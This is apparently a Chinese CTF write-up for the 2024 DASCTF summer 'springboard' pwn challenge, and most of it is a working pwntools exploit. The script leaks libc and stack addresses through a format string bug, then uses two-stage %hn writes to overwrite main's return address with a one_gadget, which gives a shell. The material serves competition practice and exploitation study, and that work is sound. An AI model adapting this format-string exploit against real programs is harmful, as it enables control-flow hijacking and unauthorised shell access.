2024DASCTF夏季PWN

springboard

格式化字符串漏洞，且格式化字符串本身不在栈上的类型：

利用任意地址写，将 main 函数的返回地址（ret addr）改为 one gadget 即可。

from pwn import *


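def stack_write(p: "process", stack_base, offset, value):
    """Store the 16-bit ``value`` at ``stack_base + offset`` with two format strings.

    The first payload writes the low half-word of the target address through
    ``%11$hn``; the second writes ``value`` through ``%39$hn``. How argument 11
    reaches argument 39 is a property of the target's stack layout that this
    script does not show — see the writeup text above. Every payload ends in a
    NUL so the newline appended by ``sendlineafter`` is not parsed as part of
    the format string.

    Args:
        p: pwntools tube connected to the target process.
        stack_base: address whose low 16 bits get rewritten to reach the target.
        offset: distance from ``stack_base`` to the half-word being written.
        value: the 16-bit value to store.

    Raises:
        ValueError: if ``(stack_base & 0xFFFF) + offset`` leaves the range a
            single half-word write can express, or if ``value`` does not fit
            in 16 bits.
    """
    low_target = (stack_base & 0xFFFF) + offset
    # Without a carry out of bit 15, (stack_base + offset) & 0xFFFF equals
    # low_target, so rewriting only the low half-word really hits the target.
    if not 0 <= low_target < 0x10000:
        raise ValueError(f"target {low_target:#x} is outside the 16-bit window")
    if not 0 <= value < 0x10000:
        raise ValueError(f"value {value:#x} does not fit in 16 bits")

    _send_halfword_write(p, stack_base + offset, 11)
    _send_halfword_write(p, value, 39)


def _send_halfword_write(p, count, arg_index):
    """Send ``%<count & 0xFFFF>c%<arg_index>$hn`` plus a NUL after the prompt."""
    payload = f"%{count & 0xFFFF}c%{arg_index}$hn".encode("ascii")
    p.sendlineafter(b"Please enter a keyword\n", payload + b"\x00")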


def main():
    """Run the two-stage exploit against a local ``./pwn`` instance.

    Stage one sends ``%9$p,%11$p`` to leak a libc pointer and a stack pointer;
    stage two uses ``stack_write`` twice to place the low 32 bits of the chosen
    one_gadget address at ``stack_ + 0x18`` (the writeup above identifies this
    slot as main's saved return address). The upper half of that slot is never
    written.
    """
    context.log_level = "debug"
    p = process("./pwn")
    libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")

    # All deltas below are specific to this binary and libc build.
    libc_leak_delta = 0x24083
    stack_leak_delta = 0x108
    one_gadget_candidates = (0xE3B04, 0xE3AFE, 0xE3B01)
    target_slot = 0x18
    prompt = b"Please enter a keyword\n"

    # Stage 1: one request, two comma-separated pointers in the reply.
    p.sendlineafter(prompt, b"%9$p,%11$p,\x00")

    def read_pointer() -> int:
        return int(p.recvuntil(",", drop=True).decode("ascii"), 16)

    libc.address = read_pointer() - libc_leak_delta
    print(f"[+] libc {libc.address:#x}")

    stack_ = read_pointer() - stack_leak_delta
    print(f"[*]  stack_ = {stack_:#x}")

    # gdb.attach(p)
    # pause()
    og = libc.address + one_gadget_candidates[2]
    # Stage 2: two half-word writes cover bits 0..31 of the slot.
    for half in range(2):
        chunk = (og >> (16 * half)) & 0xFFFF
        stack_write(p, stack_, target_slot + 2 * half, chunk)
    p.interactive()


if __name__ == "__main__":
    # Only launch the target when run as a script, not on import.
    main()